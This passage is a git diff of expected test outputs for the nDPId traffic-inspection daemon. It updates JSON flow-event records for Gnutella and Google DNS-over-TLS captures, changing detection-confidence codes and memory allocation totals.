00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4215,7 +4215,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4252,8 +4252,8 @@ 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7491,"packets-processed":7468,"total-skipped-flows":0,"total-l4-payload-len":3617715,"total-not-detected-flows":629,"total-guessed-flows":2,"total-detected-flows":170,"total-detection-updates":3,"total-updates":298,"current-active-flows":0,"total-active-flows":801,"total-idle-flows":801,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":4259,"global_ts_msec":600247} @@ -4265,9 +4265,9 @@ ~~ total active/idle flows...: 801/801 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7049358 bytes -~~ total memory freed........: 7049358 bytes -~~ total allocations/frees...: 129026/129026 +~~ total memory allocated....: 7182992 bytes +~~ total memory freed........: 7182992 bytes +~~ total allocations/frees...: 131788/131788 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 179 chars ~~ json string max len.......: 1916 chars diff --git a/test/results/google_ssl.pcap.out b/test/results/google_ssl.pcap.out index a5b8f8f48..4d04c4fbf 100644 --- a/test/results/google_ssl.pcap.out +++ b/test/results/google_ssl.pcap.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872303 bytes -~~ total memory freed........: 5872303 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6005937 bytes +~~ total memory freed........: 6005937 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 662 chars diff --git a/test/results/googledns_android10.pcap.out b/test/results/googledns_android10.pcap.out index 3f420b3c9..311dceb4c 100644 --- a/test/results/googledns_android10.pcap.out +++ b/test/results/googledns_android10.pcap.out @@ -11,23 +11,23 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 